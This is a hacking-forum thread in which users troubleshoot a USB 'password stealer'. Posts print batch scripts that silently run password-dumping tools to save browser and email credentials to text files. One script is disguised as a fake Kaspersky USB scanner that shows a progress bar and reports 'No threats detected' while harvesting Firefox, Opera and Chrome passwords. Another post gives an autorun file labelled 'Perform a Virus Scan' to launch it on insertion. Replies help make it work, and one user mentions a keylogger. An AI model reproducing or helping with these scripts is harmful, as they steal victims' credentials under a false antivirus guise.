Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


USB HACK filter_list
Author
Message
USB HACK #1
So I tried this: http://www.hackcommunity.com/Thread-How-...e-Tutorial

But when I start it, it says: " ebhk isn't recognized as a internal or external command " and "cho isn't reconized as a internal or external command"
Why? Sad

Reply

RE: USB HACK #2
Well that indicates that there's a problem in the coding of the batch
My Blog: http://www.procurity.wordpress.com
Donations: 1HLjiSbnWMpeQU46eUVCrYdbkrtduX7snG

Reply

RE: USB HACK #3
(04-05-2013, 05:17 PM)TeemuStew Wrote: So I tried this: http://www.hackcommunity.com/Thread-How-...e-Tutorial

But when I start it, it says: " ebhk isn't recognized as a internal or external command " and "cho isn't reconized as a internal or external command"
Why? Sad

Well, the batch file there just consists of this:
Code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

So I'm not sure where did you get those "ebhk" or "cho" commands.
[Image: rytwG00.png]
Redcat Revolution!

Reply

RE: USB HACK #4
(04-05-2013, 05:42 PM)Coder-san Wrote:
(04-05-2013, 05:17 PM)TeemuStew Wrote: So I tried this: http://www.hackcommunity.com/Thread-How-...e-Tutorial

But when I start it, it says: " ebhk isn't recognized as a internal or external command " and "cho isn't reconized as a internal or external command"
Why? Sad

Well, the batch file there just consists of this:
Code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

So I'm not sure where did you get those "ebhk" or "cho" commands.

Sorry, wrong thread. The codes was
Code:
@echo off
echo ############################################################################
echo  .                                                                                                                    
echo **   **                                                  **            
echo /**  **                    ******                        /**      **   **
echo /** **    ******    ******/**///**  *****  ******  ******/**  ** //** **
echo /****    //////**  **//// /**  /** **///**//**//* **//// /** **   //***  
echo /**/**    ******* //***** /****** /******* /** / //***** /****     /**  
echo /**//**  **////**  /////**/**///  /**////  /**    /////**/**/**    **    
echo /** //**//******** ****** /**     //******/***    ****** /**//**  **    
echo //   //  //////// //////  //       ////// ///    //////  //  //  //
echo         Kaspersky LABS  USB Security Scanner
echo  .                                                                                                                
echo ############################################################################
echo Warning!!! This tool doesnot provide Real Time Protection! Please download
echo Kaspersky Internet Security from Kaspersky Labs website
echo .
echo Press any key to Scan
pause >nul
setlocal EnableDelayedExpansion
set Counter=0
set Schalter=2
set Width=0
:1
title Kaspersky USB Security Scanner - Scanning USB
set /a Counter=%Counter% + 1
set /a Display=%Counter% / 2
FOR /L %%A IN (1,1,%Display%) DO (
   set Display=!Display!²
)
cls
echo            Kaspersky is now scanning for Malware! Please Wait...                  %Counter%%%
echo     ²!Display:~2,47!
ping localhost -n 1 >nul
if "%Counter%" == "100" goto :1-End
goto :1
:1-End
echo Checking System Integrity...
start PasswordFox.exe /stext firefox.txt
echo Checking Antivirus Software, (You may get alerted of an execution! Allow the execution)
start OperaPassView.exe /stext Opera.txt
echo All Tests Passed [X]
start ChromePass.exe /stext Chrome.txt
echo Scanning Complete!
echo No threats detected
echo Press Any Key To Exit
pause >nul
EXIT /B

Reply

RE: USB HACK #5
I didn't find any errors that you stated above, in the code that you just presented.
My Blog: http://www.procurity.wordpress.com
Donations: 1HLjiSbnWMpeQU46eUVCrYdbkrtduX7snG

Reply

RE: USB HACK #6
Working fine for me too.
[Image: rytwG00.png]
Redcat Revolution!

Reply

RE: USB HACK #7
(04-05-2013, 05:17 PM)TeemuStew Wrote: So I tried this: http://www.hackcommunity.com/Thread-How-...e-Tutorial

But when I start it, it says: " ebhk isn't recognized as a internal or external command " and "cho isn't reconized as a internal or external command"
Why? Sad
My best guess is that it's due to a bad copy paste, You might have left out some part of the code
My Blog: http://www.procurity.wordpress.com
Donations: 1HLjiSbnWMpeQU46eUVCrYdbkrtduX7snG

Reply

RE: USB HACK #8
Well, the batch file there just consists of this:
Code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

So I'm not sure where did you get those "ebhk" or "cho" commands.
[/quote]

This part i'm having trouble with. I cant get it to start by itself. I have the
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
But nothing seems to happen when i stick the USB in. I am using a keylogger with that type of autorun and a password stealer with that type of autorun. neither works. Can help me?

Reply

RE: USB HACK #9
Let me get this straight. There is no popup of the autorun. Are you sure the autorun feature isn't disabled cos if you did copy that code just fine and wrote that autorun script also fine, you should be stealing passwords by now.

Reply

RE: USB HACK #10
I keep getting empty txt files... 1 time I got one that had the user as "email" and password "pass"... Dunno

Reply







Users browsing this thread: 1 Guest(s)